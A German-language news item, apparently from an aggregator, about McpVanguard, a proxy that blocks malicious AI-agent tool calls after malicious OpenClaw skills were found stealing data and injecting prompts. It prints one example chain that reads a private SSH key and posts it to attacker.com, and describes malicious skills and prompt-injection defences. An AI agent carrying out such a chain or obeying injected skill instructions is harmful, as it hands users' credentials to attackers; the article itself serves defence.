McpVanguard-Proxy blockiert OpenClaw-Fähigkeitsdaten-Exfiltration

Als Reaktion auf die Entdeckung des KI-Sicherheitsteams von Cisco, dass Drittanbieter-OpenClaw-Fähigkeiten heimlichen Datendiebstahl und Prompt-Injection durchführen, hat ein Entwickler McpVanguard veröffentlicht. Dieser Proxy ist dafür konzipiert, zwischen einem KI-Agenten und seinen Werkzeugen zu sitzen und bösartige Aufrufe zu blockieren, bevor sie ausgeführt werden.
Das Problem: Verkettete bösartige Aufrufe
Das Sicherheitsproblem ist kein Fehler in OpenClaw selbst, sondern eine Folge davon, dass Agenten Dateisystemzugriff, Shell-Ausführung und Netzwerkaufrufe ohne Durchsetzungsgrenzen haben. Ciscos Tests zeigten ein Muster, bei dem scheinbar harmlose einzelne Aufrufe kombiniert werden, um einen Angriff zu erzeugen, wie zum Beispiel:
read_file("~/.ssh/id_rsa") → http_post("attacker.com", contents)Keiner der Aufrufe erscheint isoliert betrachtet bösartig, aber zusammen exfiltrieren sie sensible Daten. Laut der Quelle hatte ClawHub auf seinem Höhepunkt über 820 bösartige Fähigkeiten, und CVE-2026-25253 ermöglichte es Angreifern, Remote-Code-Ausführung über einen einzigen bösartigen Link zu erreichen. Die derzeitige Validierung auf Fähigkeitsebene erkennt diese verketteten Aufrufsequenzen nicht.
Die Lösung: McpVanguard-Proxy
McpVanguard adressiert dies, indem es Aufrufe zwischen dem Agenten und seinen Werkzeugen abfängt. Es verwendet drei Erkennungsmethoden:
- Mustererkennung
- Semantische Absichtsbewertung
- Verhaltensketten-Erkennung über die gesamte Sitzung hinweg
Die Installation erfolgt über pip: pip install mcp-vanguard.
Tiefere Ebene: VEX-Protokoll
Das Projekt beinhaltet eine tiefere Sicherheitsebene namens VEX-Protokoll, das als "Flugschreiber"-System beschrieben wird. Es bietet:
- Merkle-Prüfpfade für manipulationssichere Protokollierung
- TPM-verwurzelte Agenten-Identitätsverifizierung
- Syscall-Ebene-Durchsetzung
Das VEX-Protokoll ist in Rust entwickelt und die Entwicklung begann im Dezember 2023, bevor OpenClaw weit verbreitet wurde. Die Quelle merkt an, dass NVIDIA kürzlich NemoClaw für ähnliche Sicherheitszwecke ausgeliefert hat, was darauf hindeutet, dass diese Art von Bedrohung nicht verschwinden wird.
Beide Projekte sind auf GitHub verfügbar:
📖 Read the full source: r/openclaw
👀 Siehe auch

OpenClaws externer Inhalts-Wrapper zur Abwehr von Prompt-Injektionen
OpenClaw verwendet einen externen Inhalts-Wrapper, der automatisch Web-Suchergebnisse, API-Antworten und ähnliche Inhalte mit Warnungen kennzeichnet, dass sie nicht vertrauenswürdig sind. Dies bereitet das LLM darauf vor, skeptisch zu sein und böswillige Anweisungen eher abzulehnen.

Praktische Sicherheitspraktiken für OpenClaw-Agenten
Ein Reddit-Beitrag beschreibt spezifische Sicherheitspraktiken für OpenClaw-Nutzer, darunter geplante Befehle für Updates und Audits, die Verwaltung des Agentenzugriffs in geteilten Kanälen sowie die Sicherung von API-Schlüsseln und Skills.

Erkundung der Risiken der Nutzung eines Google-Kontos mit Gemini-Cli und Gemini Pro-Abonnement
Gemini-Cli und Ihr Gemini Pro-Abonnement könnten einige Risiken für Ihr Google-Konto darstellen. Hier erfahren Sie, was Sie über mögliche Schwachstellen im Umgang mit diesen KI-Tools wissen müssen.

Claude Code VS Code Erweiterung gibt Auswahlstatus über geschlossene Dateien und neue Sitzungen hinweg preis
Ein Fehler in der VS Code-Erweiterung von Claude Code speichert den Auswahlstatus einer Datei zwischen, selbst nachdem die Datei geschlossen wurde, wodurch vertrauliche Daten (z. B. Supabase-Dienstrollenschlüssel) in einer brandneuen CLI-Sitzung offengelegt werden. Vollständige Reproduktionsschritte und GitHub-Issue #58886.